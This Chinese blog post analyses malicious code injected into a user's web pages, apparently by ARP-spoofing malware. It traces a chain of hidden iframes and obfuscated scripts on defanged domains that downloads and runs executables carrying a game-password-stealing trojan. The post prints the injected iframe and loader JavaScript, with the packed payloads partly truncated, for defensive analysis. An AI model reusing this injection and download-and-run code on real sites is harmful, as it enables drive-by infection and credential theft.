前两天,一位网友反映他最近打开网页显示都是乱码。
让他把网页源代码传过来分析,发现网页首部被加入代码:
/--- <iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe> ---/ hxxp://**.9**-*6*.in/n.js 包含代码: /--- document.writeln("<script>window.onerror=function(){return true;}<\/script>"); document.writeln("<script src=\"hxxp:\/\/**.9**-*6*.in\/S368\/NewJs2.js\"><\/script>"); document.writeln("<script>"); document.writeln("function StartRun(){"); document.writeln("var Then = new Date() "); document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); document.writeln("var cookieString = new String(document.cookie)"); document.writeln("var cookieHeader = \"Cookie1=\" "); document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.writeln("if (beginPosition!= -1){ "); document.writeln("} else "); document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln("document.write(\'<iframe width=0 height=0 src=\"hxxp:\/\/**.9**-*6*.in\/s368\/T368.htm\"><\/iframe>\');"); document.writeln("}"); document.writeln("}"); document.writeln("StartRun();"); document.writeln("<\/script>") ---/ hxxp://**.9**-*6*.in/S368/NewJs2.js 内容为: /--- StrInfo = "\x3c\x73\x63…(略)…\x74\x3e" window["\x64\…(略)…\x74"]["\x77…(略)…\x65"](StrInfo); ---/ 经过2次解密得到原始代码,功能是下载S368.exe,保存到 %windir%,文件由自定义函数 /--- function GnMs(n) { var numberMs = Math.random()*n; return '~Temp'+Math.round(numberMs)+'.tmp'; } ---/ 生成,即~Temp****.tmp,然后调用 cmd.exe /c 来运行。 hxxp://**.9**-*6*.in/s368/T368.htm 内容为: /--- <script> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…123|eval'.split('|'),0,{})) ---/ 经过2次解密得到原始代码: /--- info = "<script src=\"S368.jpg\"></script>" document.write(info) <script src="S368.jpg"></script> ---/ hxxp://**.9**-*6*.in/s368/S368.jpg 的内容为: /--- eval(function(p,a,c,k,e,r){e=function(c){return(…(略)…|x55'.split('|'),0,{})) ---/ 经过2次解密得到原始代码,功能是利用 WebThunder,通过IE打开网页 hxxp://c***k*1**.in/S368/downmm.html,通过 wscript.shell有exec 执行 IE缓存中的 S3682[1].exe。 hxxp://c***k*1**.in/S368/downmm.html 的内容为: /--- <script> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…|eval'.split('|'),0,{})) </script> ---/ 经过2次解密得到原始代码: /--- eval("document.writeln("<script src=\"S3682.exe\"><\/script>")")<script src="S3682.exe"></script> <script src="S3682.exe"></script> ---/ ----------------------------------- ©著作权归作者所有:来自51CTO博客作者PurpleEndurer的原创作品,请联系作者获取转载授权,否则将追究法律责任 ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码 https://blog.51cto.com/endurer/5900029
